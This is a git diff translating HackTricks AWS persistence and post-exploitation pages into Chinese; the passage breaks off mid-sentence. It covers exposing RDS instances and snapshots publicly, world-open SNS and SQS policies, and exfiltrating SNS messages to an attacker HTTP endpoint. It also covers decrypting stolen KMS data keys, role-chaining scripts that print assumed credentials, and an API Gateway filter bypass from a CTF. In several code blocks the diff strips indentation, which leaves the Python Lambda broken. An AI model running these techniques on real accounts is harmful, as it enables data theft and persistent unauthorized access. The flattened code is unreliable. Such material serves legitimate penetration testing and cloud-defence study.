+### 使实例公开可访问:`rds:ModifyDBInstance` +具有此权限的攻击者可以**修改现有的 RDS 实例以启用公共可访问性**。 ```bash aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately ``` +### 在数据库中创建管理员用户 -### Create an admin user inside the DB - -An attacker could just **create a user inside the DB** so even if the master users password is modified he **doesn't lose the access** to the database. - -### Make snapshot public +攻击者可以**在数据库中创建一个用户**,即使主用户的密码被修改,他也**不会失去对数据库的访问**。 +### 使快照公开 ```bash aws rds modify-db-snapshot-attribute --db-snapshot-identifier --attribute-name restore --values-to-add all ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md index f2c4ce048..2eb434759 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-s3-persistence.md @@ -1,29 +1,25 @@ -# AWS - S3 Persistence +# AWS - S3 持久性 {{#include ../../../banners/hacktricks-training.md}} ## S3 -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-s3-athena-and-glacier-enum.md {{#endref}} -### KMS Client-Side Encryption +### KMS 客户端加密 -When the encryption process is done the user will use the KMS API to generate a new key (`aws kms generate-data-key`) and he will **store the generated encrypted key inside the metadata** of the file ([python code example](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)) so when the decrypting occur it can decrypt it using KMS again: +当加密过程完成后,用户将使用 KMS API 生成一个新密钥(`aws kms generate-data-key`),并将**生成的加密密钥存储在文件的元数据中**([python 代码示例](https://aioboto3.readthedocs.io/en/latest/cse.html#how-it-works-kms-managed-keys)),以便在解密时可以再次使用 KMS 进行解密:
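作为示意,下面是一个假设性的草图,展示如何读取对象元数据中存储的加密数据密钥并交给 KMS 解密;其中的桶名、对象名以及元数据字段名(不同客户端实现可能使用 `x-amz-key`、`x-amz-key-v2` 等不同字段)均为假设:
```bash
# 1. 读取对象元数据,找到客户端加密时写入的加密数据密钥(字段名随 SDK 实现而异)
aws s3api head-object --bucket victim-bucket --key secret-file.enc \
  --query 'Metadata' --output json
# 假设返回的元数据中包含 "x-amz-key-v2": "<base64 编码的加密数据密钥>"

# 2. base64 解码后交给 KMS 解密(若加密时使用了 encryption context,
#    还需通过 --encryption-context 提供,其内容通常可从 x-amz-matdesc 元数据中恢复)
echo "<base64-encrypted-data-key>" | base64 -d > /tmp/edk.bin
aws kms decrypt --ciphertext-blob fileb:///tmp/edk.bin \
  --output text --query Plaintext
# 输出(base64 编码)即为用于加密该对象内容的数据密钥
```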
-Therefore, and attacker could get this key from the metadata and decrypt with KMS (`aws kms decrypt`) to obtain the key used to encrypt the information. This way the attacker will have the encryption key and if that key is reused to encrypt other files he will be able to use it. +因此,攻击者可以从元数据中获取此密钥,并使用 KMS(`aws kms decrypt`)进行解密,以获得用于加密信息的密钥。这样,攻击者将拥有加密密钥,如果该密钥被重用于加密其他文件,他将能够使用它。 -### Using S3 ACLs +### 使用 S3 ACLs -Although usually ACLs of buckets are disabled, an attacker with enough privileges could abuse them (if enabled or if the attacker can enable them) to keep access to the S3 bucket. +尽管通常存储桶的 ACL 被禁用,但具有足够权限的攻击者可以滥用它们(如果启用或攻击者可以启用它们)以保持对 S3 存储桶的访问。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md index c15f27003..7dc60a195 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-secrets-manager-persistence.md @@ -4,54 +4,48 @@ ## Secrets Manager -For more info check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-secrets-manager-enum.md {{#endref}} -### Via Resource Policies +### 通过资源策略 -It's possible to **grant access to secrets to external accounts** via resource policies. Check the [**Secrets Manager Privesc page**](../aws-privilege-escalation/aws-secrets-manager-privesc.md) for more information. Note that to **access a secret**, the external account will also **need access to the KMS key encrypting the secret**. +可以通过资源策略**授予外部账户对秘密的访问权限**。有关更多信息,请查看[**Secrets Manager Privesc 页面**](../aws-privilege-escalation/aws-secrets-manager-privesc.md)。请注意,要**访问一个秘密**,外部账户还**需要访问加密该秘密的 KMS 密钥**。 -### Via Secrets Rotate Lambda +### 通过 Secrets Rotate Lambda -To **rotate secrets** automatically a configured **Lambda** is called. If an attacker could **change** the **code** he could directly **exfiltrate the new secret** to himself. 
- -This is how lambda code for such action could look like: +要**自动旋转秘密**,会调用一个配置好的**Lambda**。如果攻击者能够**更改**该**代码**,他可以直接**将新秘密导出**给自己。 +这就是此类操作的 Lambda 代码可能的样子: ```python import boto3 def rotate_secrets(event, context): - # Create a Secrets Manager client - client = boto3.client('secretsmanager') +# Create a Secrets Manager client +client = boto3.client('secretsmanager') - # Retrieve the current secret value - secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString'] +# Retrieve the current secret value +secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString'] - # Rotate the secret by updating its value - new_secret_value = rotate_secret(secret_value) - client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value) +# Rotate the secret by updating its value +new_secret_value = rotate_secret(secret_value) +client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value) def rotate_secret(secret_value): - # Perform the rotation logic here, e.g., generate a new password +# Perform the rotation logic here, e.g., generate a new password - # Example: Generate a new password - new_secret_value = generate_password() +# Example: Generate a new password +new_secret_value = generate_password() - return new_secret_value +return new_secret_value def generate_password(): - # Example: Generate a random password using the secrets module - import secrets - import string - password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16)) - return password +# Example: Generate a random password using the secrets module +import secrets +import string +password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16)) +return password ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md index 8e97cc81c..c8cb805d5 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sns-persistence.md @@ -1,85 +1,77 @@ -# AWS - SNS Persistence +# AWS - SNS 持久性 {{#include ../../../banners/hacktricks-training.md}} ## SNS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-sns-enum.md {{#endref}} -### Persistence - -When creating a **SNS topic** you need to indicate with an IAM policy **who has access to read and write**. 
It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ -The following policy gives everyone in AWS access to read and write in the SNS topic called **`MySNS.fifo`**: +### 持久性 +创建 **SNS 主题** 时,您需要通过 IAM 策略指明 **谁有权读取和写入**。可以指明外部账户、角色的 ARN,或 **甚至 "\*"**。\ +以下策略允许 AWS 中的每个人访问名为 **`MySNS.fifo`** 的 SNS 主题进行读取和写入: ```json { - "Version": "2008-10-17", - "Id": "__default_policy_ID", - "Statement": [ - { - "Sid": "__default_statement_ID", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": [ - "SNS:Publish", - "SNS:RemovePermission", - "SNS:SetTopicAttributes", - "SNS:DeleteTopic", - "SNS:ListSubscriptionsByTopic", - "SNS:GetTopicAttributes", - "SNS:AddPermission", - "SNS:Subscribe" - ], - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo", - "Condition": { - "StringEquals": { - "AWS:SourceOwner": "318142138553" - } - } - }, - { - "Sid": "__console_pub_0", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "SNS:Publish", - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" - }, - { - "Sid": "__console_sub_0", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "SNS:Subscribe", - "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" - } - ] +"Version": "2008-10-17", +"Id": "__default_policy_ID", +"Statement": [ +{ +"Sid": "__default_statement_ID", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": [ +"SNS:Publish", +"SNS:RemovePermission", +"SNS:SetTopicAttributes", +"SNS:DeleteTopic", +"SNS:ListSubscriptionsByTopic", +"SNS:GetTopicAttributes", +"SNS:AddPermission", +"SNS:Subscribe" +], +"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo", +"Condition": { +"StringEquals": { +"AWS:SourceOwner": "318142138553" +} +} +}, +{ +"Sid": "__console_pub_0", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "SNS:Publish", +"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" +}, +{ +"Sid": "__console_sub_0", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "SNS:Subscribe", +"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" +} +] } ``` +### 创建订阅者 -### Create Subscribers - -To continue exfiltrating all the messages from all the topics and attacker could **create subscribers for all the topics**. - -Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used. +为了继续从所有主题中提取所有消息,攻击者可以**为所有主题创建订阅者**。 +请注意,如果**主题是 FIFO 类型**,则只能使用协议**SQS**的订阅者。 ```bash aws sns subscribe --region \ - --protocol http \ - --notification-endpoint http:/// \ - --topic-arn +--protocol http \ +--notification-endpoint http:/// \ +--topic-arn ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md index 88f396173..98030299c 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md @@ -1,43 +1,37 @@ -# AWS - SQS Persistence +# AWS - SQS 持久性 {{#include ../../../banners/hacktricks-training.md}} ## SQS -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-sqs-and-sns-enum.md {{#endref}} -### Using resource policy - -In SQS you need to indicate with an IAM policy **who has access to read and write**. 
It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\ -The following policy gives everyone in AWS access to everything in the queue called **MyTestQueue**: +### 使用资源策略 +在 SQS 中,您需要通过 IAM 策略指明 **谁可以访问读取和写入**。可以指明外部账户、角色的 ARN,或 **甚至 "\*"**。\ +以下策略允许 AWS 中的每个人访问名为 **MyTestQueue** 的队列中的所有内容: ```json { - "Version": "2008-10-17", - "Id": "__default_policy_ID", - "Statement": [ - { - "Sid": "__owner_statement", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": ["SQS:*"], - "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue" - } - ] +"Version": "2008-10-17", +"Id": "__default_policy_ID", +"Statement": [ +{ +"Sid": "__owner_statement", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": ["SQS:*"], +"Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue" +} +] } ``` - > [!NOTE] -> You could even **trigger a Lambda in the attackers account every-time a new message** is put in the queue (you would need to re-put it) somehow. For this follow these instructinos: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html) +> 您甚至可以**在攻击者的账户中每次有新消息**放入队列时触发一个 Lambda(您需要以某种方式重新放入它)。为此,请遵循以下说明: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md index c1b9a422b..3bd0aae28 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md @@ -1,6 +1 @@ # AWS - SSM Perssitence - - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md index 4e8c120ff..2c12e3f5e 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md @@ -4,7 +4,7 @@ ## Step Functions -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-stepfunctions-enum.md @@ -12,14 +12,10 @@ For more information check: ### Step function Backdooring -Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps. +对步骤函数进行后门设置,使其执行任何持久性技巧,以便每次执行时都会运行您的恶意步骤。 ### Backdooring aliases -If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function. 
+如果AWS账户使用别名来调用步骤函数,则可以修改别名以使用步骤函数的新后门版本。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md index 74db04bec..9ca4ad338 100644 --- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md @@ -1,65 +1,62 @@ -# AWS - STS Persistence +# AWS - STS 持久性 {{#include ../../../banners/hacktricks-training.md}} ## STS -For more information access: +有关更多信息,请访问: {{#ref}} ../aws-services/aws-sts-enum.md {{#endref}} -### Assume role token +### 假设角色令牌 -Temporary tokens cannot be listed, so maintaining an active temporary token is a way to maintain persistence. +临时令牌无法列出,因此保持活动的临时令牌是一种维持持久性的方法。
aws sts get-session-token --duration-seconds 129600
 
-# With MFA
+# 使用 MFA
 aws sts get-session-token \
-    --serial-number <mfa-device-name> \
-    --token-code <code-from-token>
+    --serial-number <mfa-device-name> \
+    --token-code <code-from-token>
 
-# Hardware device name is usually the number from the back of the device, such as GAHT12345678
-# SMS device name is the ARN in AWS, such as arn:aws:iam::123456789012:sms-mfa/username
-# Vritual device name is the ARN in AWS, such as arn:aws:iam::123456789012:mfa/username
+# 硬件设备名称通常是设备背面的数字,例如 GAHT12345678
+# 短信设备名称是 AWS 中的 ARN,例如 arn:aws:iam::123456789012:sms-mfa/username
+# 虚拟设备名称是 AWS 中的 ARN,例如 arn:aws:iam::123456789012:mfa/username
 
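作为补充示意,获取到的临时凭证可以直接导出为环境变量继续使用(以下各值均为占位示例):
```bash
# 将 get-session-token / assume-role 返回的临时凭证导出为环境变量
export AWS_ACCESS_KEY_ID="ASIA..."                # 占位示例
export AWS_SECRET_ACCESS_KEY="<SecretAccessKey>"  # 占位示例
export AWS_SESSION_TOKEN="<SessionToken>"         # 占位示例

# 确认临时凭证仍然有效
aws sts get-caller-identity
```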
-### Role Chain Juggling
+### 角色链切换(Role Chain Juggling)

-[**Role chaining is an acknowledged AWS feature**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), often utilized for maintaining stealth persistence. It involves the ability to **assume a role which then assumes another**, potentially reverting to the initial role in a **cyclical manner**. Each time a role is assumed, the credentials' expiration field is refreshed. Consequently, if two roles are configured to mutually assume each other, this setup allows for the perpetual renewal of credentials.
-
-You can use this [**tool**](https://github.com/hotnops/AWSRoleJuggler/) to keep the role chaining going:
+[**角色链(Role chaining)是 AWS 认可的一个特性**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining),常被用来维持隐蔽的持久性。它指的是 **先假设一个角色,再由该角色假设另一个角色**,并可能以 **循环的方式** 回到初始角色。每次假设角色时,凭证的过期时间都会刷新。因此,如果两个角色被配置为可以相互假设,这种设置就能让凭证被不断续期。
+您可以使用这个 [**工具**](https://github.com/hotnops/AWSRoleJuggler/) 来持续进行这种角色链切换:
```bash
./aws_role_juggler.py -h
usage: aws_role_juggler.py [-h] [-r ROLE_LIST [ROLE_LIST ...]]

optional arguments:
- -h, --help show this help message and exit
- -r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]
+-h, --help show this help message and exit
+-r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]
```
-
> [!CAUTION]
-> Note that the [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) script from that Github repository doesn't find all the ways a role chain can be configured.
+> 请注意,该 Github 存储库中的 [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) 脚本并不能找到角色链可被配置的所有方式。

<details>
-Code to perform Role Juggling from PowerShell - +从PowerShell执行角色切换的代码 ```powershell # PowerShell script to check for role juggling possibilities using AWS CLI # Check for AWS CLI installation if (-not (Get-Command "aws" -ErrorAction SilentlyContinue)) { - Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'." - exit +Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'." +exit } # Function to list IAM roles function List-IAMRoles { - aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json +aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json } # Initialize error count @@ -70,66 +67,61 @@ $roles = List-IAMRoles | ConvertFrom-Json # Attempt to assume each role foreach ($role in $roles) { - $sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) - try { - $credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json - if ($credentials) { - Write-Host "Successfully assumed role: $($role.RoleName)" - Write-Host "Access Key: $($credentials.AccessKeyId)" - Write-Host "Secret Access Key: $($credentials.SecretAccessKey)" - Write-Host "Session Token: $($credentials.SessionToken)" - Write-Host "Expiration: $($credentials.Expiration)" +$sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) +try { +$credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json +if ($credentials) { +Write-Host "Successfully assumed role: $($role.RoleName)" +Write-Host "Access Key: $($credentials.AccessKeyId)" +Write-Host "Secret Access Key: $($credentials.SecretAccessKey)" +Write-Host "Session Token: $($credentials.SessionToken)" +Write-Host "Expiration: $($credentials.Expiration)" - # Set temporary credentials to assume the next role - $env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId - $env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey - $env:AWS_SESSION_TOKEN = $credentials.SessionToken +# Set temporary credentials to assume the next role +$env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId +$env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey +$env:AWS_SESSION_TOKEN = $credentials.SessionToken - # Try to assume another role using the temporary credentials - foreach ($nextRole in $roles) { - if ($nextRole.Arn -ne $role.Arn) { - $nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) - try { - $nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json - if ($nextCredentials) { - Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)" - Write-Host "Access Key: $($nextCredentials.AccessKeyId)" - Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)" - Write-Host "Session Token: $($nextCredentials.SessionToken)" - Write-Host "Expiration: $($nextCredentials.Expiration)" - } - } catch { - $errorCount++ - } - } - } +# Try to assume another role using the temporary credentials +foreach ($nextRole in $roles) { +if ($nextRole.Arn -ne $role.Arn) { +$nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime) +try { +$nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json +if ($nextCredentials) { 
+Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)" +Write-Host "Access Key: $($nextCredentials.AccessKeyId)" +Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)" +Write-Host "Session Token: $($nextCredentials.SessionToken)" +Write-Host "Expiration: $($nextCredentials.Expiration)" +} +} catch { +$errorCount++ +} +} +} - # Reset environment variables - Remove-Item Env:\AWS_ACCESS_KEY_ID - Remove-Item Env:\AWS_SECRET_ACCESS_KEY - Remove-Item Env:\AWS_SESSION_TOKEN - } else { - $errorCount++ - } - } catch { - $errorCount++ - } +# Reset environment variables +Remove-Item Env:\AWS_ACCESS_KEY_ID +Remove-Item Env:\AWS_SECRET_ACCESS_KEY +Remove-Item Env:\AWS_SESSION_TOKEN +} else { +$errorCount++ +} +} catch { +$errorCount++ +} } # Output the number of errors if any if ($errorCount -gt 0) { - Write-Host "$errorCount error(s) occurred during role assumption attempts." +Write-Host "$errorCount error(s) occurred during role assumption attempts." } else { - Write-Host "No errors occurred. All roles checked successfully." +Write-Host "No errors occurred. All roles checked successfully." } Write-Host "Role juggling check complete." ``` -
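除了上面折叠块中的 PowerShell 检查脚本之外,下面是一个假设性的 bash 草图,演示两个互相信任的角色如何循环地相互假设对方,从而不断刷新临时凭证(其中的角色 ARN 仅为示例):
```bash
#!/bin/bash
# 假设 role-a 与 role-b 的信任策略允许彼此 sts:AssumeRole(ARN 仅为示例)
ROLE_A="arn:aws:iam::123456789012:role/role-a"
ROLE_B="arn:aws:iam::123456789012:role/role-b"
CURRENT_ROLE="$ROLE_A"

while true; do
  # 用当前凭证假设链中的下一个角色,并导出新的临时凭证
  CREDS=$(aws sts assume-role --role-arn "$CURRENT_ROLE" \
    --role-session-name juggling --query Credentials --output json)
  export AWS_ACCESS_KEY_ID=$(echo "$CREDS" | jq -r .AccessKeyId)
  export AWS_SECRET_ACCESS_KEY=$(echo "$CREDS" | jq -r .SecretAccessKey)
  export AWS_SESSION_TOKEN=$(echo "$CREDS" | jq -r .SessionToken)

  # 在凭证过期前切换到链中的另一个角色,从而持续获得新的临时凭证
  if [ "$CURRENT_ROLE" = "$ROLE_A" ]; then CURRENT_ROLE="$ROLE_B"; else CURRENT_ROLE="$ROLE_A"; fi
  sleep 3000   # 角色链会话最长为 1 小时,提前刷新
done
```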
{{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md index 53f79d916..c692338a4 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md @@ -1,6 +1 @@ -# AWS - Post Exploitation - - - - - +# AWS - 后期利用 diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md index 4847c40e0..96829e503 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md @@ -4,48 +4,43 @@ ## API Gateway -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-api-gateway-enum.md {{#endref}} -### Access unexposed APIs +### 访问未公开的 API -You can create an endpoint in [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) with the service `com.amazonaws.us-east-1.execute-api`, expose the endpoint in a network where you have access (potentially via an EC2 machine) and assign a security group allowing all connections.\ -Then, from the EC2 machine you will be able to access the endpoint and therefore call the gateway API that wasn't exposed before. +您可以在 [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) 创建一个服务为 `com.amazonaws.us-east-1.execute-api` 的端点,将该端点暴露在您可以访问的网络中(可能通过 EC2 机器),并分配一个允许所有连接的安全组。\ +然后,从 EC2 机器上,您将能够访问该端点,从而调用之前未公开的网关 API。 -### Bypass Request body passthrough +### 绕过请求体传递 -This technique was found in [**this CTF writeup**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp). +此技术在 [**此 CTF 文章**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp) 中发现。 -As indicated in the [**AWS documentation**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) in the `PassthroughBehavior` section, by default, the value **`WHEN_NO_MATCH`** , when checking the **Content-Type** header of the request, will pass the request to the back end with no transformation. 
- -Therefore, in the CTF the API Gateway had an integration template that was **preventing the flag from being exfiltrated** in a response when a request was sent with `Content-Type: application/json`: +正如 [**AWS 文档**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) 中的 `PassthroughBehavior` 部分所示,默认情况下,值 **`WHEN_NO_MATCH`** 在检查请求的 **Content-Type** 头时,将请求传递给后端而不进行任何转换。 +因此,在 CTF 中,API Gateway 有一个集成模板,该模板 **阻止了标志在响应中被外泄**,当请求以 `Content-Type: application/json` 发送时: ```yaml RequestTemplates: - application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}' +application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}' ``` +然而,发送一个带有 **`Content-type: text/json`** 的请求将会阻止该过滤器。 -However, sending a request with **`Content-type: text/json`** would prevent that filter. - -Finally, as the API Gateway was only allowing `Get` and `Options`, it was possible to send an arbitrary dynamoDB query without any limit sending a POST request with the query in the body and using the header `X-HTTP-Method-Override: GET`: - +最后,由于 API Gateway 仅允许 `Get` 和 `Options`,因此可以通过发送一个带有查询的 POST 请求,并使用头部 `X-HTTP-Method-Override: GET` 来发送任意的 dynamoDB 查询,而没有任何限制: ```bash curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json' --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}' ``` +### 使用计划 DoS -### Usage Plans DoS +在 **Enumeration** 部分,您可以看到如何 **获取密钥的使用计划**。如果您拥有密钥并且它的 **每月使用次数限制为 X**,您可以 **直接使用它并造成 DoS**。 -In the **Enumeration** section you can see how to **obtain the usage plan** of the keys. If you have the key and it's **limited** to X usages **per month**, you could **just use it and cause a DoS**. - -The **API Key** just need to be **included** inside a **HTTP header** called **`x-api-key`**. +**API Key** 只需包含在一个名为 **`x-api-key`** 的 **HTTP 头** 中。 ### `apigateway:UpdateGatewayResponse`, `apigateway:CreateDeployment` -An attacker with the permissions `apigateway:UpdateGatewayResponse` and `apigateway:CreateDeployment` can **modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts**. - +拥有权限 `apigateway:UpdateGatewayResponse` 和 `apigateway:CreateDeployment` 的攻击者可以 **修改现有的 Gateway Response,以包含自定义头或响应模板,这些模板泄露敏感信息或执行恶意脚本**。 ```bash API_ID="your-api-id" RESPONSE_TYPE="DEFAULT_4XX" @@ -56,16 +51,14 @@ aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RE # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources. 
+**潜在影响**:敏感信息泄露、执行恶意脚本或未经授权访问API资源。 > [!NOTE] -> Need testing +> 需要测试 ### `apigateway:UpdateStage`, `apigateway:CreateDeployment` -An attacker with the permissions `apigateway:UpdateStage` and `apigateway:CreateDeployment` can **modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings to gain unauthorized access to cached data**. - +拥有权限 `apigateway:UpdateStage` 和 `apigateway:CreateDeployment` 的攻击者可以 **修改现有的API Gateway阶段,将流量重定向到不同的阶段或更改缓存设置以获得对缓存数据的未经授权访问**。 ```bash API_ID="your-api-id" STAGE_NAME="Prod" @@ -76,16 +69,14 @@ aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --pat # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Unauthorized access to cached data, disrupting or intercepting API traffic. +**潜在影响**:未经授权访问缓存数据,干扰或拦截API流量。 > [!NOTE] -> Need testing +> 需要测试 ### `apigateway:PutMethodResponse`, `apigateway:CreateDeployment` -An attacker with the permissions `apigateway:PutMethodResponse` and `apigateway:CreateDeployment` can **modify the method response of an existing API Gateway REST API method to include custom headers or response templates that leak sensitive information or execute malicious scripts**. - +拥有权限 `apigateway:PutMethodResponse` 和 `apigateway:CreateDeployment` 